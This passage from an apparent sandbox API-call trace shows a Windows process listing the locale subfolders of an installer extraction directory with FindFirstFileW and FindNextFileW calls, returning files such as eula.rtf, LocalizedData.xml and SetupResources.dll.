ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0195.921] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0195.921] FindClose (in: hFindFile=0x604938 | out: hFindFile=0x604938) returned 1 [0195.922] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0195.922] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1035", cAlternateFileName="")) returned 1 [0195.923] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1035\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604378 [0196.003] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.003] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe76, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.003] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12cde, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.003] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.003] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.003] FindClose (in: hFindFile=0x604378 | out: hFindFile=0x604378) returned 1 [0196.005] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0196.005] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1036", cAlternateFileName="")) returned 1 [0196.005] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1036\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604278 [0196.013] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.013] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.013] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x14412, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.014] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.014] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.014] FindClose (in: hFindFile=0x604278 | out: hFindFile=0x604278) returned 1 [0196.015] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0196.015] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1037", cAlternateFileName="")) returned 1 [0196.015] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1037\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604638 [0196.015] FindNextFileW (in: hFindFile=0x604638, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.015] FindNextFileW (in: hFindFile=0x604638, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.015] FindNextFileW (in: hFindFile=0x604638, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1198c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.015] FindNextFileW (in: hFindFile=0x604638, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.016] FindNextFileW (in: hFindFile=0x604638, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.016] FindClose (in: hFindFile=0x604638 | out: hFindFile=0x604638) returned 1 [0196.016] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0196.016] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1038", cAlternateFileName="")) returned 1 [0196.016] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1038\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604538 [0196.016] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.016] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x109e, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.016] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x151aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.017] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.017] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.017] FindClose (in: hFindFile=0x604538 | out: hFindFile=0x604538) returned 1 [0196.017] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0196.017] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1040", cAlternateFileName="")) returned 1 [0196.017] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1040\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604678 [0196.018] FindNextFileW (in: hFindFile=0x604678, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.018] FindNextFileW (in: hFindFile=0x604678, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.018] FindNextFileW (in: hFindFile=0x604678, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x138bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.018] FindNextFileW (in: hFindFile=0x604678, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.018] FindNextFileW (in: hFindFile=0x604678, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.018] FindClose (in: hFindFile=0x604678 | out: hFindFile=0x604678) returned 1 [0196.018] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0196.018] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1041", cAlternateFileName="")) returned 1 [0196.019] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1041\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604578 [0196.019] FindNextFileW (in: hFindFile=0x604578, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.019] FindNextFileW (in: hFindFile=0x604578, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x278d, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.019] FindNextFileW (in: hFindFile=0x604578, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x10a82, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.020] FindNextFileW (in: hFindFile=0x604578, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.020] FindNextFileW (in: hFindFile=0x604578, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.020] FindClose (in: hFindFile=0x604578 | out: hFindFile=0x604578) returned 1 [0196.020] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0196.020] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1042", cAlternateFileName="")) returned 1 [0196.020] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1042\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, 